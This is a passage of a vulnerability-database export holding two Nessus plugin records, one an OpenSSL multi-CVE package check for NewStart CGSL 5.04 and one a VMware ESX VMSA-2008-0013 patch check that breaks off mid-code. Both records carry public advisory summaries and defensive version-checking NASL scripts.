multi- threading and internal caching are enabled on a TLS server, might allow remote attackers to execute arbitrary code via client data that triggers a heap- based buffer overflow, related to (1) the TLS server name extension and (2) elliptic curve cryptography.\n (CVE-2010-3864)\n\n - OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the downgrade to an unintended cipher via vectors involving sniffing network traffic to discover a session identifier. (CVE-2010-4180)\n\n - ssl/t1_lib.c in OpenSSL 0.9.8h through 0.9.8q and 1.0.0 through 1.0.0c allows remote attackers to cause a denial of service (crash), and possibly obtain sensitive information in applications that use OpenSSL, via a malformed ClientHello handshake message that triggers an out-of-bounds memory access, aka OCSP stapling vulnerability. (CVE-2011-0014)\n\n - crypto/x509/x509_vfy.c in OpenSSL 1.0.x before 1.0.0e does not initialize certain structure members, which makes it easier for remote attackers to bypass CRL validation by using a nextUpdate value corresponding to a time in the past. (CVE-2011-3207)\n\n - OpenSSL 0.9.8s and 1.0.0f does not properly support DTLS applications, which allows remote attackers to cause a denial of service (crash) via unspecified vectors related to an out-of-bounds read. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-4108. (CVE-2012-0050)\n\n - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key. (CVE-2012-2110)\n\n - The ssl3_take_mac function in ssl/s3_both.c in OpenSSL 1.0.1 before 1.0.1f allows remote TLS servers to cause a denial of service (NULL pointer dereference and application crash) via a crafted Next Protocol Negotiation record in a TLS handshake. (CVE-2013-4353)\n\n - The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client.\n (CVE-2013-6449)\n\n - The DTLS retransmission implementation in OpenSSL 1.0.0 before 1.0.0l and 1.0.1 before 1.0.1f does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context and cause a denial of service (application crash) by interfering with packet delivery, related to ssl/d1_both.c and ssl/t1_enc.c. (CVE-2013-6450)\n\n - An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160)\n\n - A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. (CVE-2014-3566)\n\n - A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-08-12T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : openssl Multiple Vulnerabilities (NS-SA-2019-0033)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2007-3108", "CVE-2007-4995", "CVE-2007-5135", "CVE-2008-0891", "CVE-2008-1672", "CVE-2008-1678", "CVE-2009-1377", "CVE-2009-1378", "CVE-2009-1379", "CVE-2009-3555", "CVE-2009-4355", "CVE-2010-0742", "CVE-2010-1633", "CVE-2010-3864", "CVE-2010-4180", "CVE-2011-0014", "CVE-2011-3207", "CVE-2011-4108", "CVE-2012-0050", "CVE-2012-2110", "CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-0160", "CVE-2014-3566", "CVE-2015-3193", "CVE-2016-0701", "CVE-2016-2183", "CVE-2017-3732", "CVE-2017-3736", "CVE-2017-3737", "CVE-2017-3738"], "modified": "2022-05-19T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0033_OPENSSL.NASL", "href": "https://www.tenable.com/plugins/nessus/127201", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0033. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127201);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/19\");\n\n script_cve_id(\n \"CVE-2006-2937\",\n \"CVE-2006-2940\",\n \"CVE-2006-3738\",\n \"CVE-2006-4339\",\n \"CVE-2006-4343\",\n \"CVE-2007-3108\",\n \"CVE-2007-4995\",\n \"CVE-2007-5135\",\n \"CVE-2008-0891\",\n \"CVE-2008-1672\",\n \"CVE-2009-1377\",\n \"CVE-2009-1378\",\n \"CVE-2009-1379\",\n \"CVE-2009-3555\",\n \"CVE-2009-4355\",\n \"CVE-2010-0742\",\n \"CVE-2010-1633\",\n \"CVE-2010-3864\",\n \"CVE-2010-4180\",\n \"CVE-2011-0014\",\n \"CVE-2011-3207\",\n \"CVE-2012-0050\",\n \"CVE-2012-2110\",\n \"CVE-2013-4353\",\n \"CVE-2013-6449\",\n \"CVE-2013-6450\",\n \"CVE-2014-0160\",\n \"CVE-2014-3566\",\n \"CVE-2016-2183\",\n \"CVE-2017-3736\",\n \"CVE-2017-3737\",\n \"CVE-2017-3738\"\n );\n script_bugtraq_id(92630);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : openssl Multiple Vulnerabilities (NS-SA-2019-0033)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssl packages installed that are affected\nby multiple vulnerabilities:\n\n - OpenSSL 1.0.2 (starting from version 1.0.2b) introduced\n an error state mechanism. The intent was that if a\n fatal error occurred during a handshake then OpenSSL\n would move into the error state and would immediately\n fail if you attempted to continue the handshake. This\n works as designed for the explicit handshake functions\n (SSL_do_handshake(), SSL_accept() and SSL_connect()),\n however due to a bug it does not work correctly if\n SSL_read() or SSL_write() is called directly. In that\n scenario, if the handshake fails then a fatal error will\n be returned in the initial function call. If\n SSL_read()/SSL_write() is subsequently called by the\n application for the same SSL object then it will succeed\n and the data is passed without being decrypted/encrypted\n directly from the SSL/TLS record layer. In order to\n exploit this issue an application bug would have to be\n present that resulted in a call to\n SSL_read()/SSL_write() being issued after having already\n received a fatal error. OpenSSL version 1.0.2b-1.0.2m\n are affected. Fixed in OpenSSL 1.0.2n. OpenSSL 1.1.0 is\n not affected. (CVE-2017-3737)\n\n - There is an overflow bug in the AVX2 Montgomery\n multiplication procedure used in exponentiation with\n 1024-bit moduli. No EC algorithms are affected. Analysis\n suggests that attacks against RSA and DSA as a result of\n this defect would be very difficult to perform and are\n not believed likely. Attacks against DH1024 are\n considered just feasible, because most of the work\n necessary to deduce information about a private key may\n be performed offline. The amount of resources required\n for such an attack would be significant. However, for an\n attack on TLS to be meaningful, the server would have to\n share the DH1024 private key among multiple clients,\n which is no longer an option since CVE-2016-0701. This\n only affects processors that support the AVX2 but not\n ADX extensions like Intel Haswell (4th generation).\n Note: The impact from this issue is similar to\n CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL\n version 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected.\n Fixed in OpenSSL 1.0.2n. Due to the low severity of this\n issue we are not issuing a new release of OpenSSL 1.1.0\n at this time. The fix will be included in OpenSSL 1.1.0h\n when it becomes available. The fix is also available in\n commit e502cc86d in the OpenSSL git repository.\n (CVE-2017-3738)\n\n - There is a carry propagating bug in the x86_64\n Montgomery squaring procedure in OpenSSL before 1.0.2m\n and 1.1.0 before 1.1.0g. No EC algorithms are affected.\n Analysis suggests that attacks against RSA and DSA as a\n result of this defect would be very difficult to perform\n and are not believed likely. Attacks against DH are\n considered just feasible (although very difficult)\n because most of the work necessary to deduce information\n about a private key may be performed offline. The amount\n of resources required for such an attack would be very\n significant and likely only accessible to a limited\n number of attackers. An attacker would additionally need\n online access to an unpatched system using the target\n private key in a scenario with persistent DH parameters\n and a private key that is shared between multiple\n clients. This only affects processors that support the\n BMI1, BMI2 and ADX extensions like Intel Broadwell (5th\n generation) and later or AMD Ryzen. (CVE-2017-3736)\n\n - OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d\n allows remote attackers to cause a denial of service\n (infinite loop and memory consumption) via malformed\n ASN.1 structures that trigger an improperly handled\n error condition. (CVE-2006-2937)\n\n - OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and\n earlier versions allows attackers to cause a denial of\n service (CPU consumption) via parasitic public keys with\n large (1) public exponent or (2) public modulus\n values in X.509 certificates that require extra time to\n process when using RSA signature verification.\n (CVE-2006-2940)\n\n - Buffer overflow in the SSL_get_shared_ciphers function\n in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and\n earlier versions has unspecified impact and remote\n attack vectors involving a long list of ciphers.\n (CVE-2006-3738)\n\n - OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8\n before 0.9.8c, when using an RSA key with exponent 3,\n removes PKCS-1 padding before generating a hash, which\n allows remote attackers to forge a PKCS #1 v1.5\n signature that is signed by that RSA key and prevents\n OpenSSL from correctly verifying X.509 and other\n certificates that use PKCS #1. (CVE-2006-4339)\n\n - The get_server_hello function in the SSLv2 client code\n in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and\n earlier versions allows remote servers to cause a denial\n of service (client crash) via unknown vectors that\n trigger a null pointer dereference. (CVE-2006-4343)\n\n - The BN_from_montgomery function in crypto/bn/bn_mont.c\n in OpenSSL 0.9.8e and earlier does not properly perform\n Montgomery multiplication, which might allow local users\n to conduct a side-channel attack and retrieve RSA\n private keys. (CVE-2007-3108)\n\n - Off-by-one error in the DTLS implementation in OpenSSL\n 0.9.8 before 0.9.8f allows remote attackers to execute\n arbitrary code via unspecified vectors. (CVE-2007-4995)\n\n - Off-by-one error in the SSL_get_shared_ciphers function\n in OpenSSL 0.9.7 up to 0.9.7l, and 0.9.8 up to 0.9.8f,\n might allow remote attackers to execute arbitrary code\n via a crafted packet that triggers a one-byte buffer\n underflow. NOTE: this issue was introduced as a result\n of a fix for CVE-2006-3738. As of 20071012, it is\n unknown whether code execution is possible.\n (CVE-2007-5135)\n\n - Double free vulnerability in OpenSSL 0.9.8f and 0.9.8g,\n when the TLS server name extensions are enabled, allows\n remote attackers to cause a denial of service (crash)\n via a malformed Client Hello packet. NOTE: some of these\n details are obtained from third party information.\n (CVE-2008-0891)\n\n - OpenSSL 0.9.8f and 0.9.8g allows remote attackers to\n cause a denial of service (crash) via a TLS handshake\n that omits the Server Key Exchange message and uses\n particular cipher suites, which triggers a NULL\n pointer dereference. (CVE-2008-1672)\n\n - The dtls1_buffer_record function in ssl/d1_pkt.c in\n OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote\n attackers to cause a denial of service (memory\n consumption) via a large series of future epoch DTLS\n records that are buffered in a queue, aka DTLS record\n buffer limitation bug. (CVE-2009-1377)\n\n - Multiple memory leaks in the\n dtls1_process_out_of_seq_message function in\n ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8\n versions allow remote attackers to cause a denial of\n service (memory consumption) via DTLS records that (1)\n are duplicates or (2) have sequence numbers much greater\n than current sequence numbers, aka DTLS fragment\n handling memory leak. (CVE-2009-1378)\n\n - Use-after-free vulnerability in the\n dtls1_retrieve_buffered_fragment function in\n ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote\n attackers to cause a denial of service (openssl s_client\n crash) and possibly have unspecified other impact via a\n DTLS packet, as demonstrated by a packet from a server\n that uses a crafted server certificate. (CVE-2009-1379)\n\n - The TLS protocol, and the SSL protocol 3.0 and possibly\n earlier, as used in Microsoft Internet Information\n Services (IIS) 7.0, mod_ssl in the Apache HTTP Server\n 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5\n and earlier, Mozilla Network Security Services (NSS)\n 3.12.4 and earlier, multiple Cisco products, and other\n products, does not properly associate renegotiation\n handshakes with an existing connection, which allows\n man-in-the-middle attackers to insert data into HTTPS\n sessions, and possibly other types of sessions protected\n by TLS or SSL, by sending an unauthenticated request\n that is processed retroactively by a server in a post-\n renegotiation context, related to a plaintext\n injection attack, aka the Project Mogul issue.\n (CVE-2009-3555)\n\n - Memory leak in the zlib_stateful_finish function in\n crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and\n 1.0.0 Beta through Beta 4 allows remote attackers to\n cause a denial of service (memory consumption) via\n vectors that trigger incorrect calls to the\n CRYPTO_cleanup_all_ex_data function, as demonstrated by\n use of SSLv3 and PHP with the Apache HTTP Server, a\n related issue to CVE-2008-1678. (CVE-2009-4355)\n\n - The Cryptographic Message Syntax (CMS) implementation in\n crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x\n before 1.0.0a does not properly handle structures that\n contain OriginatorInfo, which allows context-dependent\n attackers to modify invalid memory locations or conduct\n double-free attacks, and possibly execute arbitrary\n code, via unspecified vectors. (CVE-2010-0742)\n\n - RSA verification recovery in the EVP_PKEY_verify_recover\n function in OpenSSL 1.x before 1.0.0a, as used by\n pkeyutl and possibly other applications, returns\n uninitialized memory upon failure, which might allow\n context-dependent attackers to bypass intended key\n requirements or obtain sensitive information via\n unspecified vectors. NOTE: some of these details are\n obtained from third party information. (CVE-2010-1633)\n\n - Multiple race conditions in ssl/t1_lib.c in OpenSSL\n 0.9.8f through 0.9.8o, 1.0.0, and 1.0.0a, when multi-\n threading and internal caching are enabled on a TLS\n server, might allow remote attackers to execute\n arbitrary code via client data that triggers a heap-\n based buffer overflow, related to (1) the TLS server\n name extension and (2) elliptic curve cryptography.\n (CVE-2010-3864)\n\n - OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when\n SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does\n not properly prevent modification of the ciphersuite in\n the session cache, which allows remote attackers to\n force the downgrade to an unintended cipher via vectors\n involving sniffing network traffic to discover a session\n identifier. (CVE-2010-4180)\n\n - ssl/t1_lib.c in OpenSSL 0.9.8h through 0.9.8q and 1.0.0\n through 1.0.0c allows remote attackers to cause a denial\n of service (crash), and possibly obtain sensitive\n information in applications that use OpenSSL, via a\n malformed ClientHello handshake message that triggers an\n out-of-bounds memory access, aka OCSP stapling\n vulnerability. (CVE-2011-0014)\n\n - crypto/x509/x509_vfy.c in OpenSSL 1.0.x before 1.0.0e\n does not initialize certain structure members, which\n makes it easier for remote attackers to bypass CRL\n validation by using a nextUpdate value corresponding to\n a time in the past. (CVE-2011-3207)\n\n - OpenSSL 0.9.8s and 1.0.0f does not properly support DTLS\n applications, which allows remote attackers to cause a\n denial of service (crash) via unspecified vectors\n related to an out-of-bounds read. NOTE: this\n vulnerability exists because of an incorrect fix for\n CVE-2011-4108. (CVE-2012-0050)\n\n - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c\n in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1\n before 1.0.1a does not properly interpret integer data,\n which allows remote attackers to conduct buffer overflow\n attacks, and cause a denial of service (memory\n corruption) or possibly have unspecified other impact,\n via crafted DER data, as demonstrated by an X.509\n certificate or an RSA public key. (CVE-2012-2110)\n\n - The ssl3_take_mac function in ssl/s3_both.c in OpenSSL\n 1.0.1 before 1.0.1f allows remote TLS servers to cause a\n denial of service (NULL pointer dereference and\n application crash) via a crafted Next Protocol\n Negotiation record in a TLS handshake. (CVE-2013-4353)\n\n - The ssl_get_algorithm2 function in ssl/s3_lib.c in\n OpenSSL before 1.0.2 obtains a certain version number\n from an incorrect data structure, which allows remote\n attackers to cause a denial of service (daemon crash)\n via crafted traffic from a TLS 1.2 client.\n (CVE-2013-6449)\n\n - The DTLS retransmission implementation in OpenSSL 1.0.0\n before 1.0.0l and 1.0.1 before 1.0.1f does not properly\n maintain data structures for digest and encryption\n contexts, which might allow man-in-the-middle attackers\n to trigger the use of a different context and cause a\n denial of service (application crash) by interfering\n with packet delivery, related to ssl/d1_both.c and\n ssl/t1_enc.c. (CVE-2013-6450)\n\n - An information disclosure flaw was found in the way\n OpenSSL handled TLS and DTLS Heartbeat Extension\n packets. A malicious TLS or DTLS client or server could\n send a specially crafted TLS or DTLS Heartbeat packet to\n disclose a limited portion of memory per request from a\n connected client or server. Note that the disclosed\n portions of memory could potentially include sensitive\n information such as private keys. (CVE-2014-0160)\n\n - A flaw was found in the way SSL 3.0 handled padding\n bytes when decrypting messages encrypted using block\n ciphers in cipher block chaining (CBC) mode. This flaw\n allows a man-in-the-middle (MITM) attacker to decrypt a\n selected byte of a cipher text in as few as 256 tries if\n they are able to force a victim application to\n repeatedly send the same data over newly created SSL 3.0\n connections. (CVE-2014-3566)\n\n - A flaw was found in the way the DES/3DES cipher was used\n as part of the TLS/SSL protocol. A man-in-the-middle\n attacker could use this flaw to recover some plaintext\n data by capturing large amounts of encrypted traffic\n between TLS/SSL server and client if the communication\n used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0033\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL openssl packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-3738\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2016-2183\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 287, 310, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL CORE 5.04\": [\n \"openssl-1.0.2k-12.el7.cgslv5lite.0.1.g0e5ddfd\",\n \"openssl-crypto-1.0.2k-12.el7.cgslv5lite.0.1.g0e5ddfd\",\n \"openssl-debuginfo-1.0.2k-12.el7.cgslv5lite.0.1.g0e5ddfd\",\n \"openssl-devel-1.0.2k-12.el7.cgslv5lite.0.1.g0e5ddfd\",\n \"openssl-libs-1.0.2k-12.el7.cgslv5lite.0.1.g0e5ddfd\",\n \"openssl-perl-1.0.2k-12.el7.cgslv5lite.0.1.g0e5ddfd\",\n \"openssl-static-1.0.2k-12.el7.cgslv5lite.0.1.g0e5ddfd\"\n ],\n \"CGSL MAIN 5.04\": [\n \"openssl-1.0.2k-12.el7.cgslv5\",\n \"openssl-debuginfo-1.0.2k-12.el7.cgslv5\",\n \"openssl-devel-1.0.2k-12.el7.cgslv5\",\n \"openssl-libs-1.0.2k-12.el7.cgslv5\",\n \"openssl-perl-1.0.2k-12.el7.cgslv5\",\n \"openssl-static-1.0.2k-12.el7.cgslv5\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:07:18", "description": "I Security Issues\n\n a. OpenSSL Binaries Updated\n\n This fix updates the third-party OpenSSL library.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-3108 and CVE-2007-5135 to the issues addressed by this update.\n\nII Service Console rpm updates\n\n a. net-snmp Security update\n\n This fix upgrades the service console rpm for net-snmp to version net-snmp-5.0.9-2.30E.24.\n Note: this update is relevant for ESX 3.0.3. The initial advisory incorrectly stated that this update was present in ESX 3.0.3 when it was released on August 8, 2008.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2008-2292 and CVE-2008-0960 to the issues addressed in net-snmp-5.0.9-2.30E.24.\n\n b. perl Security update\n\n This fix upgrades the service console rpm for perl to version perl-5.8.0-98.EL3.\n\n Note: this update is relevant for ESX 3.0.3. The initial advisory incorrectly stated that this update was present in ESX 3.0.3 when it was released on August 8, 2008.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-1927 to the issue addressed in perl-5.8.0-98.EL3.", "cvss3": {"score": null, "vector": null}, "published": "2009-07-27T00:00:00", "type": "nessus", "title": "VMSA-2008-0013 : Updated ESX packages for OpenSSL, net-snmp, perl", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2007-3108", "CVE-2007-5135", "CVE-2008-0960", "CVE-2008-1927", "CVE-2008-2292"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:3.0.1", "cpe:/o:vmware:esx:3.0.2", "cpe:/o:vmware:esx:3.0.3", "cpe:/o:vmware:esx:3.5"], "id": "VMWARE_VMSA-2008-0013.NASL", "href": "https://www.tenable.com/plugins/nessus/40381", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2008-0013. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40381);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3738\", \"CVE-2007-3108\", \"CVE-2007-5135\", \"CVE-2008-0960\", \"CVE-2008-1927\", \"CVE-2008-2292\");\n script_bugtraq_id(25831, 28928, 29212, 29623);\n script_xref(name:\"VMSA\", value:\"2008-0013\");\n\n script_name(english:\"VMSA-2008-0013 : Updated ESX packages for OpenSSL, net-snmp, perl\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESX host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"I Security Issues\n\n a. OpenSSL Binaries Updated\n\n This fix updates the third-party OpenSSL library.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2007-3108 and CVE-2007-5135 to the issues\n addressed by this update.\n\nII Service Console rpm updates\n\n a. net-snmp Security update\n\n This fix upgrades the service console rpm for net-snmp to version\n net-snmp-5.0.9-2.30E.24.\n \n Note: this update is relevant for ESX 3.0.3. The initial advisory\n incorrectly stated that this update was present in ESX 3.0.3\n when it was released on August 8, 2008.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2008-2292 and CVE-2008-0960 to the issues\n addressed in net-snmp-5.0.9-2.30E.24.\n\n b. perl Security update\n\n This fix upgrades the service console rpm for perl to version\n perl-5.8.0-98.EL3.\n\n Note: this update is relevant for ESX 3.0.3. The initial advisory\n incorrectly stated that this update was present in ESX 3.0.3\n when it was released on August 8, 2008.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2008-1927 to the issue addressed in\n perl-5.8.0-98.EL3.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2008/000036.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 189, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2008-08-12\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1005115\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1006030\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1006355\")) flag++;\n\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1005116\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1006031\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1006037\")) flag++;\n\nif (\n esx_check(\n ver : \"ESX 3.0.3\",\n patch : \"ESX303-200808401-SG\",\n patch_updates : make_list(\"ESX303-201002202-UG\", \"ESX303-Update01\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 